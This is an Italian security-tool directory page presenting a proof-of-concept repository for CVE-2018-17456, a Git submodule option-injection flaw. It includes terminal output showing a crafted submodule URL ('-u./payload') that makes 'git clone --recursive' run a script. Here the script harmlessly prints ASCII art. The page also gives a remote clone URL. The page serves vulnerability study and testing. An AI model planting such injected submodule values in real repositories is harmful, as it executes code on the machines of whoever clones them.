Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-17456 — CVE-2018-17456 riproduzione della vulnerabilità (PoC+Exp) | Kitploit
Strumenti/GitHubGitHub/anonymking/cve-2018-17456
Analisi delle VulnerabilitàAnalisi del CodiceExploitSicurezza della Supply ChainApprendimento e FormazioneBinary Exploitation
GitHubanonymking/cve-2018-17456

CVE-2018-17456

CVE-2018-17456 riproduzione della vulnerabilità (PoC+Exp)

Vedi Repository
57 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2018-17456

Panoramica della vulnerabilità

  • Nome vulnerabilità: Errore di convalida dell'input in Git
  • ID CNNVD: CNNVD-201810-234
  • Livello di gravità: Critico
  • ID CVE: CVE-2018-17456
  • Tipo vulnerabilità: Errore di convalida dell'input
  • Data pubblicazione: 2018-10-08
  • Tipo minaccia: Remota
  • Data aggiornamento: 2019-04-25
  • Produttore: debian
  • Fonte vulnerabilità: Atlassian, TerryZh...
  • Descrizione vulnerabilità: Git è un sistema di controllo versione distribuito gratuito e open source. In Git è presente una vulnerabilità di errore di convalida dell'input. La vulnerabilità deriva dal fatto che il sistema o il prodotto di rete non esegue una corretta convalida dei dati in input. Le seguenti versioni sono interessate: Git precedente alla 2.14.5, versioni 2.15.x precedenti alla 2.15.3, versioni 2.16.x precedenti alla 2.16.5, versioni 2.17.x precedenti alla 2.17.2, versioni 2.18.x precedenti alla 2.18.1, versioni 2.19.x precedenti alla 2.19.1.

Riproduzione della vulnerabilità

  • A causa dei meccanismi di sicurezza di GitHub, non è possibile caricare progetti dannosi, quindi puoi eseguire lo script build.sh per costruire localmente questo progetto per studio e test.
  • La versione di Git che ho usato è git-2.12.1
  • Il processo e l'effetto sono come segue:
root@kitploit:~
[anonymking@localhost test]$ ./build.sh 
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/Submodule/.git/
[master (root-commit) 5b1e97c] submodule
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 hgt_blank
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/.git/
Cloning into '/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/exploit:exploit'...
done.
[master (root-commit) ed1914d] CVE-2018-17456
 3 files changed, 6 insertions(+)
 create mode 100644 .gitmodules
 create mode 160000 exploit:exploit
 create mode 100755 payload
git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" des_dir



[anonymking@localhost test]$ git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" test
Cloning into 'test'...
done.
Submodule 'exploit:exploit' (-u./payload) registered for path 'exploit:exploit'
Cloning into 'exploit'...


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '<  `.___\_<|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '-u./payload' into submodule path '/home/anonymking/Desktop/test/test/exploit:exploit' failed
Failed to clone 'exploit:exploit' a second time, aborting
  • Ho inserito nel payload un codice malevolo che produce un Buddha, quindi vedere il Buddha significa che il test è riuscito; in realtà viene prodotto due volte perché quando il clone del sottomodulo fallisce viene eseguito un tentativo di ripetizione.

Riferimenti

  • Progetto poc-submodule

Scoperta casuale

  • Ho costruito con successo questo progetto su Coding — CVE-2018-17456
  • Come usarlo:
root@kitploit:~
git clone --recursive https://dev.tencent.com/u/anonymking/p/CVE-2018-17456/git test
  • Inoltre, raccomando di studiare insieme due vulnerabilità simili: CVE-2017-1000117, CVE-2018-11235
Scarica lo strumento